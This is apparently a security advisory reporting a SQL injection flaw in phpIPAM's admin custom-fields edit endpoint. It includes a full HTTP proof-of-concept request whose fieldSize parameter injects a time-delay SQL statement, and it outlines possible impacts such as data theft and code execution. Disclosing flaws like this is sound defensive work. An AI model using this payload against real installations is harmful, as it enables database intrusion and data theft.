Description

SQL injection when updating custom fields in the admin panel.

Malicious web admins can use POST /app/admin/custom-fields/edit-result.php with parameters fieldType=set&fieldSize='1') CHARACTER SET utf8; SELECT sleep(3); # to execute the inserted SQL command SELECT sleep(3); and thus result this POST responded delayed with additional 3 seconds. Note that, here we use SELECT sleep(3); just for example, the attackers can inject arbitrary SQL commands (even the OS commands through system command in SQL)

Proof of Concept

POST /app/admin/custom-fields/edit-result.php HTTP/2
Host: demo.phpipam.net
Cookie: table-page-size=50; phpipam=v0d720v6gkk435n12a682fbo3u
Content-Length: 212
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.phpipam.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.phpipam.net/administration/custom-fields/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

name=Ticketnummer&oldname=custom_Ticketnummer&action=edit&table=ipaddresses&csrf_cookie=HNLec2zon3Q0rBRXgIY_QxBaajHsmqAB&Comment=&fieldType=set&fieldSize='1') CHARACTER SET utf8;  SELECT sleep(3); #&fieldDefault=

Impact

This vulnerability allows authenticated admins to perform SQL injection. A successful attack may result from the selection of entire tables and, in certain cases, the attacker gaining administrative rights to a database, writing files to the server leading to Remote Code Execute, XXS Stored, or writing a script to extract data.